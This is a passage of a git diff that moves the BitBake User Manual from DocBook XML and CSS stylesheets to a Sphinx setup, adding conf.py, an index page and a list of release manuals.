-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml
deleted file mode 100644
index d793265c9a..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml
+++ /dev/null
@@ -1,88 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<book id='bitbake-user-manual' lang='en'
-        xmlns:xi="http://www.w3.org/2003/XInclude"
-        xmlns="http://docbook.org/ns/docbook"
-        >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/bitbake-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            BitBake User Manual
-        </title>
-
-        <authorgroup>
-            <author>
-                <firstname>Richard Purdie, Chris Larson, and </firstname> <surname>Phil Blundell</surname>
-                <affiliation>
-                    <orgname>BitBake Community</orgname>
-                </affiliation>
-                <email>bitbake-devel@lists.openembedded.org</email>
-            </author>
-        </authorgroup>
-
-<!--
-# Add in some revision history if we want it here.
-        <revhistory>
-            <revision>
-                <revnumber>x.x</revnumber>
-                <date>dd month year</date>
-                <revremark>Some relevent comment</revremark>
-            </revision>
-            <revision>
-                <revnumber>x.x</revnumber>
-                <date>dd month year</date>
-                <revremark>Some relevent comment</revremark>
-            </revision>
-            <revision>
-                <revnumber>x.x</revnumber>
-                <date>dd month year</date>
-                <revremark>Some relevent comment</revremark>
-            </revision>
-            <revision>
-                <revnumber>x.x</revnumber>
-                <date>dd month year</date>
-                <revremark>Some relevent comment</revremark>
-            </revision>
-       </revhistory>
--->
-
-        <copyright>
-            <year>2004-2018</year>
-            <holder>Richard Purdie</holder>
-            <holder>Chris Larson</holder>
-            <holder>and Phil Blundell</holder>
-        </copyright>
-
-        <legalnotice>
-            <para>
-                This work is licensed under the Creative Commons Attribution License.
-                To view a copy of this license, visit
-                <ulink url="http://creativecommons.org/licenses/by/2.5/">http://creativecommons.org/licenses/by/2.5/</ulink>
-                or send a letter to Creative Commons, 444 Castro Street,
-                Suite 900, Mountain View, California 94041, USA.
-            </para>
-        </legalnotice>
-    </bookinfo>
-
-    <xi:include href="bitbake-user-manual-intro.xml"/>
-
-    <xi:include href="bitbake-user-manual-execution.xml"/>
-
-    <xi:include href="bitbake-user-manual-metadata.xml"/>
-
-    <xi:include href="bitbake-user-manual-fetching.xml"/>
-
-    <xi:include href="bitbake-user-manual-ref-variables.xml"/>
-
-    <xi:include href="bitbake-user-manual-hello.xml"/>
-
-</book>
diff --git a/bitbake/doc/bitbake-user-manual/html.css b/bitbake/doc/bitbake-user-manual/html.css
deleted file mode 100644
index 6eedfd3189..0000000000
--- a/bitbake/doc/bitbake-user-manual/html.css
+++ /dev/null
@@ -1,281 +0,0 @@
-/* Feuille de style DocBook du projet Traduc.org                */
-/* DocBook CSS stylesheet of the Traduc.org project             */
-
-/* (c) Jean-Philippe Guérard - 14 août 2004                     */
-/* (c) Jean-Philippe Guérard - 14 August 2004                   */
-
-/* Cette feuille de style est libre, vous pouvez la             */
-/* redistribuer et la modifier selon les termes de la Licence   */
-/* Art Libre. Vous trouverez un exemplaire de cette Licence sur */
-/* http://tigreraye.org/Petit-guide-du-traducteur.html#licence-art-libre */
-
-/* This work of art is free, you can redistribute it and/or     */
-/* modify it according to terms of the Free Art license. You    */
-/* will find a specimen of this license on the Copyleft         */
-/* Attitude web site: http://artlibre.org as well as on other   */
-/* sites.                                                       */
-/* Please note that the French version of this licence as shown */
-/* on http://tigreraye.org/Petit-guide-du-traducteur.html#licence-art-libre */
-/* is only official licence of this document. The English       */
-/* is only provided to help you understand this licence.        */
-
-/* La dernière version de cette feuille de style est toujours   */
-/* disponible sur : http://tigreraye.org/style.css              */
-/* Elle est également disponible sur :                          */
-/* http://www.traduc.org/docs/HOWTO/lecture/style.css           */
-
-/* The latest version of this stylesheet is available from:     */
-/* http://tigreraye.org/style.css                               */
-/* It is also available on:                                     */
-/* http://www.traduc.org/docs/HOWTO/lecture/style.css           */
-
-/* N'hésitez pas à envoyer vos commentaires et corrections à    */
-/* Jean-Philippe Guérard <jean-philippe.guerard@tigreraye.org>  */
-
-/* Please send feedback and bug reports to                      */
-/* Jean-Philippe Guérard <jean-philippe.guerard@tigreraye.org>  */
-
-/* $Id: style.css,v 1.14 2004/09/10 20:12:09 fevrier Exp fevrier $ */
-
-/* Présentation générale du document */
-/* Overall document presentation */
-
-body {
-    /*
-    font-family: Apolline, "URW Palladio L", Garamond, jGaramond,
-                 "Bitstream Cyberbit", "Palatino Linotype", serif;
-     */
-    margin: 7%;
-    background-color: white;
-}
-
-/* Taille du texte */
-/* Text size */
-
-* { font-size: 100%; }
-
-/* Gestion des textes mis en relief imbriqués */
-/* Embedded emphasis */
-
-em { font-style: italic; }
-em em { font-style: normal; }
-em em em { font-style: italic; }
-
-/* Titres */
-/* Titles */
-
-h1 { font-size: 200%; font-weight: 900; }
-h2 { font-size: 160%; font-weight: 900; }
-h3 { font-size: 130%; font-weight: bold; }
-h4 { font-size: 115%; font-weight: bold; }
-h5 { font-size: 108%; font-weight: bold; }
-h6 {                  font-weight: bold; }
-
-/* Nom de famille en petites majuscules (uniquement en français) */
-/* Last names in small caps (for French only) */
-
-*[class~="surname"]:lang(fr) { font-variant: small-caps; }
-
-/* Blocs de citation */
-/* Quotation blocs */
-
-div[class~="blockquote"] {
-  border: solid 2px #AAA;
-  padding: 5px;
-  margin: 5px;
-}
-
-div[class~="blockquote"] > table {
-  border: none;
-}
-
-/* Blocs litéraux : fond gris clair */
-/* Literal blocs: light gray background */
-
-*[class~="literallayout"] {
-  background: #f0f0f0;
-  padding: 5px;
-  margin: 5px;
-}
-
-/* Programmes et captures texte : fond bleu clair */
-/* Listing and text screen snapshots: light blue background */
-
-*[class~="programlisting"], *[class~="screen"] {
-  background: #f0f0ff;
-  padding: 5px;
-  margin: 5px;
-}
-
-/* Les textes à remplacer sont surlignés en vert pâle */
-/* Replaceable text in highlighted in pale green */
-
-*[class~="replaceable"] { 
-    background-color: #98fb98;
-    font-style: normal; }
-
-/* Tables : fonds gris clair & bords simples */
-/* Tables: light gray background and solid borders */
-
-*[class~="table"] *[class~="title"] { width:100%; border: 0px; }
-
-table {
-    border: 1px solid #aaa;
-    border-collapse: collapse;
-    padding: 2px;
-    margin: 5px;
-}
-
-/* Listes simples en style table */
-/* Simples lists in table presentation */
-
-table[class~="simplelist"] {
-    background-color: #F0F0F0;
-    margin: 5px;
-    border: solid 1px #AAA;
-}
-
-table[class~="simplelist"] td {
-    border: solid 1px #AAA;
-}
-
-/* Les tables */
-/* Tables */
-
-*[class~="table"] table {
-    background-color: #F0F0F0;
-    border: solid 1px #AAA;
-}
-*[class~="informaltable"] table { background-color: #F0F0F0; }
-
-th,td {
-    vertical-align: baseline;
-    text-align: left;
-    padding: 0.1em 0.3em;
-    empty-cells: show; 
-}
-
-/* Alignement des colonnes */
-/* Colunms alignment */
-
-td[align=center] ,  th[align=center]  { text-align: center; }
-td[align=right] ,   th[align=right]   { text-align: right; }
-td[align=left] ,    th[align=left]    { text-align: left; }
-td[align=justify] , th[align=justify] { text-align: justify; }
-
-/* Pas de marge autour des images */
-/* No inside margins for images */
-
-img { border: 0; }
-
-/* Les liens ne sont pas soulignés */
-/* No underlines for links */
-
-:link , :visited , :active { text-decoration: none; }
-
-/* Prudence : cadre jaune et fond jaune clair */
-/* Caution: yellow border and light yellow background */
-
-*[class~="caution"] {
-    border: solid 2px yellow;
-    background-color: #ffffe0;
-    padding: 1em 6px 1em ;
-    margin: 5px;
-}
-
-*[class~="caution"] th {
-    vertical-align: middle
-}
-
-*[class~="caution"] table {
-    background-color: #ffffe0;
-    border: none;
-}
-
-/* Note importante : cadre jaune et fond jaune clair */
-/* Important: yellow border and light yellow background */
-
-*[class~="important"] {
-    border: solid 2px yellow;
-    background-color: #ffffe0;
-    padding: 1em 6px 1em;
-    margin: 5px;
-}
-
-*[class~="important"] th {
-    vertical-align: middle
-}
-
-*[class~="important"] table  {
-    background-color: #ffffe0;
-    border: none;
-}
-
-/* Mise en évidence : texte légèrement plus grand */
-/* Highlights: slightly larger texts */
-
-*[class~="highlights"] {
-    font-size:  110%;
-}
-
-/* Note : cadre bleu et fond bleu clair */
-/* Notes: blue border and light blue background */
-
-*[class~="note"]   {
-    border: solid 2px #7099C5;
-    background-color: #f0f0ff;
-    padding: 1em 6px 1em ;
-    margin: 5px;
-}
-
-*[class~="note"] th {
-    vertical-align: middle
-}
-
-*[class~="note"] table {
-    background-color: #f0f0ff;
-    border: none;
-}
-
-/* Astuce : cadre vert et fond vert clair */
-/* Tip: green border and light green background */
-
-*[class~="tip"] {
-    border: solid 2px #00ff00;
-    background-color: #f0ffff;
-    padding: 1em 6px 1em ;
-    margin: 5px;
-}
-
-*[class~="tip"] th {
-    vertical-align: middle;
-}
-
-*[class~="tip"] table {
-    background-color: #f0ffff;
-    border: none;
-}
-
-/* Avertissement : cadre rouge et fond rouge clair */
-/* Warning: red border and light red background */
-
-*[class~="warning"] {
-    border: solid 2px #ff0000;
-    background-color: #fff0f0; 
-    padding: 1em 6px 1em ;
-    margin: 5px;
-}
-
-*[class~="warning"] th {
-    vertical-align: middle;
-}
-                    
-
-*[class~="warning"] table {
-    background-color: #fff0f0;
-    border: none;
-}
-
-/* Fin */
-/* The End */
-
diff --git a/bitbake/doc/conf.py b/bitbake/doc/conf.py
new file mode 100644
index 0000000000..fc2ee08111
--- /dev/null
+++ b/bitbake/doc/conf.py
@@ -0,0 +1,101 @@
+# Configuration file for the Sphinx documentation builder.
+#
+# This file only contains a selection of the most common options. For a full
+# list see the documentation:
+# https://www.sphinx-doc.org/en/master/usage/configuration.html
+
+# -- Path setup --------------------------------------------------------------
+
+# If extensions (or modules to document with autodoc) are in another directory,
+# add these directories to sys.path here. If the directory is relative to the
+# documentation root, use os.path.abspath to make it absolute, like shown here.
+#
+# import os
+# import sys
+# sys.path.insert(0, os.path.abspath('.'))
+
+import sys
+import datetime
+
+current_version = "dev"
+
+# String used in sidebar
+version = 'Version: ' + current_version
+if current_version == 'dev':
+    version = 'Version: Current Development'
+# Version seen in documentation_options.js and hence in js switchers code
+release = current_version
+
+# -- Project information -----------------------------------------------------
+
+project = 'Bitbake'
+copyright = '2004-%s, Richard Purdie, Chris Larson, and Phil Blundell' \
+    % datetime.datetime.now().year
+author = 'Richard Purdie, Chris Larson, and Phil Blundell'
+
+# external links and substitutions
+extlinks = {
+    'yocto_docs': ('https://docs.yoctoproject.org%s', None),
+    'oe_lists': ('https://lists.openembedded.org%s', None),
+}
+
+# -- General configuration ---------------------------------------------------
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+    'sphinx.ext.autosectionlabel',
+    'sphinx.ext.extlinks',
+]
+autosectionlabel_prefix_document = True
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ['_templates']
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
+
+# master document name. The default changed from contents to index. so better
+# set it ourselves.
+master_doc = 'index'
+
+# create substitution for project configuration variables
+rst_prolog = """
+.. |project_name| replace:: %s
+.. |copyright| replace:: %s
+.. |author| replace:: %s
+""" % (project, copyright, author)
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages.  See the documentation for
+# a list of builtin themes.
+#
+try:
+    import sphinx_rtd_theme
+    html_theme = 'sphinx_rtd_theme'
+except ImportError:
+    sys.stderr.write("The Sphinx sphinx_rtd_theme HTML theme was not found.\
+    \nPlease make sure to install the sphinx_rtd_theme python package.\n")
+    sys.exit(1)
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = ['sphinx-static']
+
+# Add customm CSS and JS files
+html_css_files = ['theme_overrides.css']
+html_js_files = ['switchers.js']
+
+# Hide 'Created using Sphinx' text
+html_show_sphinx = False
+
+# Add 'Last updated' on each page
+html_last_updated_fmt = '%b %d, %Y'
+
+# Remove the trailing 'dot' in section numbers
+html_secnumber_suffix = " "
diff --git a/bitbake/doc/genindex.rst b/bitbake/doc/genindex.rst
new file mode 100644
index 0000000000..a4af06f656
--- /dev/null
+++ b/bitbake/doc/genindex.rst
@@ -0,0 +1,3 @@
+=====
+Index
+=====
diff --git a/bitbake/doc/index.rst b/bitbake/doc/index.rst
new file mode 100644
index 0000000000..3ff8b1580f
--- /dev/null
+++ b/bitbake/doc/index.rst
@@ -0,0 +1,38 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+===================
+BitBake User Manual
+===================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   bitbake-user-manual/bitbake-user-manual-intro
+   bitbake-user-manual/bitbake-user-manual-execution
+   bitbake-user-manual/bitbake-user-manual-metadata
+   bitbake-user-manual/bitbake-user-manual-fetching
+   bitbake-user-manual/bitbake-user-manual-ref-variables
+   bitbake-user-manual/bitbake-user-manual-hello
+
+.. toctree::
+   :maxdepth: 1
+   :hidden:
+
+   genindex
+   releases
+
+----
+
+.. include:: <xhtml1-lat1.txt>
+
+| BitBake Community
+| Copyright |copy| |copyright|
+| <bitbake-devel@lists.openembedded.org>
+
+This work is licensed under the Creative Commons Attribution License.  To view a
+copy of this license, visit http://creativecommons.org/licenses/by/2.5/ or send
+a letter to Creative Commons, 444 Castro Street, Suite 900, Mountain View,
+California 94041, USA.
diff --git a/bitbake/doc/poky.ent b/bitbake/doc/poky.ent
deleted file mode 100644
index 85d9c83bf2..0000000000
--- a/bitbake/doc/poky.ent
+++ /dev/null
@@ -1,51 +0,0 @@
-<!ENTITY DISTRO "1.4">
-<!ENTITY DISTRO_NAME "tbd">
-<!ENTITY YOCTO_DOC_VERSION "1.4">
-<!ENTITY POKYVERSION "8.0">
-<!ENTITY YOCTO_POKY "poky-&DISTRO_NAME;-&POKYVERSION;">
-<!ENTITY COPYRIGHT_YEAR "2010-2013">
-<!ENTITY YOCTO_DL_URL "http://downloads.yoctoproject.org">
-<!ENTITY YOCTO_HOME_URL "http://www.yoctoproject.org">
-<!ENTITY YOCTO_LISTS_URL "http://lists.yoctoproject.org">
-<!ENTITY YOCTO_BUGZILLA_URL "http://bugzilla.yoctoproject.org">
-<!ENTITY YOCTO_WIKI_URL "https://wiki.yoctoproject.org">
-<!ENTITY YOCTO_AB_URL "http://autobuilder.yoctoproject.org">
-<!ENTITY YOCTO_GIT_URL "http://git.yoctoproject.org">
-<!ENTITY YOCTO_ADTREPO_URL "http://adtrepo.yoctoproject.org">
-<!ENTITY OE_HOME_URL "http://www.openembedded.org">
-<!ENTITY OE_LISTS_URL "http://lists.linuxtogo.org/cgi-bin/mailman">
-<!ENTITY OE_DOCS_URL "http://docs.openembedded.org">
-<!ENTITY OH_HOME_URL "http://o-hand.com">
-<!ENTITY BITBAKE_HOME_URL "http://developer.berlios.de/projects/bitbake/">
-<!ENTITY YOCTO_DOCS_URL "&YOCTO_HOME_URL;/docs">
-<!ENTITY YOCTO_SOURCES_URL "&YOCTO_HOME_URL;/sources/">
-<!ENTITY YOCTO_AB_PORT_URL "&YOCTO_AB_URL;:8010">
-<!ENTITY YOCTO_AB_NIGHTLY_URL "&YOCTO_AB_URL;/nightly/">
-<!ENTITY YOCTO_POKY_URL "&YOCTO_DL_URL;/releases/poky/">
-<!ENTITY YOCTO_RELEASE_DL_URL "&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;">
-<!ENTITY YOCTO_TOOLCHAIN_DL_URL "&YOCTO_RELEASE_DL_URL;/toolchain/">
-<!ENTITY YOCTO_ADTINSTALLER_DL_URL "&YOCTO_RELEASE_DL_URL;/adt_installer">
-<!ENTITY YOCTO_POKY_DL_URL "&YOCTO_RELEASE_DL_URL;/&YOCTO_POKY;.tar.bz2">
-<!ENTITY YOCTO_MACHINES_DL_URL "&YOCTO_RELEASE_DL_URL;/machines">
-<!ENTITY YOCTO_QEMU_DL_URL "&YOCTO_MACHINES_DL_URL;/qemu">
-<!ENTITY YOCTO_PYTHON-i686_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-i686.tar.bz2">
-<!ENTITY YOCTO_PYTHON-x86_64_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-x86_64.tar.bz2">
-<!ENTITY YOCTO_DOCS_QS_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/yocto-project-qs/yocto-project-qs.html">
-<!ENTITY YOCTO_DOCS_ADT_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/adt-manual/adt-manual.html">
-<!ENTITY YOCTO_DOCS_REF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/ref-manual/ref-manual.html">
-<!ENTITY YOCTO_DOCS_BSP_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/bsp-guide/bsp-guide.html">
-<!ENTITY YOCTO_DOCS_DEV_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/dev-manual/dev-manual.html">
-<!ENTITY YOCTO_DOCS_KERNEL_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/kernel-manual/kernel-manual.html">
-<!ENTITY YOCTO_ADTPATH_DIR "/opt/poky/&DISTRO;">
-<!ENTITY YOCTO_POKY_TARBALL "&YOCTO_POKY;.tar.bz2">
-<!ENTITY OE_INIT_PATH "&YOCTO_POKY;/oe-init-build-env">
-<!ENTITY OE_INIT_FILE "oe-init-build-env">
-<!ENTITY UBUNTU_HOST_PACKAGES_ESSENTIAL "gawk wget git-core diffstat unzip texinfo \
-     build-essential chrpath">
-<!ENTITY FEDORA_HOST_PACKAGES_ESSENTIAL "gawk make wget tar bzip2 gzip python unzip perl patch \
-     diffutils diffstat git cpp gcc gcc-c++ eglibc-devel texinfo chrpath \
-     ccache">
-<!ENTITY OPENSUSE_HOST_PACKAGES_ESSENTIAL "python gcc gcc-c++ git chrpath make wget python-xml \
-     diffstat texinfo python-curses">
-<!ENTITY CENTOS_HOST_PACKAGES_ESSENTIAL "gawk make wget tar bzip2 gzip python unzip perl patch \
-     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath">
diff --git a/bitbake/doc/releases.rst b/bitbake/doc/releases.rst
new file mode 100644
index 0000000000..d68d71599c
--- /dev/null
+++ b/bitbake/doc/releases.rst
@@ -0,0 +1,130 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+=========================
+ Current Release Manuals
+=========================
+
+****************************
+3.1 'dunfell' Release Series
+****************************
+
+- :yocto_docs:`3.1 BitBake User Manual </3.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.1.1 BitBake User Manual </3.1.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.1.2 BitBake User Manual </3.1.2/bitbake-user-manual/bitbake-user-manual.html>`
+
+==========================
+ Previous Release Manuals
+==========================
+
+*************************
+3.0 'zeus' Release Series
+*************************
+
+- :yocto_docs:`3.0 BitBake User Manual </3.0/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.0.1 BitBake User Manual </3.0.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.0.2 BitBake User Manual </3.0.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.0.3 BitBake User Manual </3.0.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+****************************
+2.7 'warrior' Release Series
+****************************
+
+- :yocto_docs:`2.7 BitBake User Manual </2.7/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.1 BitBake User Manual </2.7.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.2 BitBake User Manual </2.7.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.3 BitBake User Manual </2.7.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.4 BitBake User Manual </2.7.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+2.6 'thud' Release Series
+*************************
+
+- :yocto_docs:`2.6 BitBake User Manual </2.6/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.1 BitBake User Manual </2.6.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.2 BitBake User Manual </2.6.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.3 BitBake User Manual </2.6.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.4 BitBake User Manual </2.6.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+2.5 'sumo' Release Series
+*************************
+
+- :yocto_docs:`2.5 BitBake User Manual </2.5/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.5.1 BitBake User Manual </2.5.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.5.2 BitBake User Manual </2.5.2/bitbake-user-manual/bitbake-user-manual.html>`
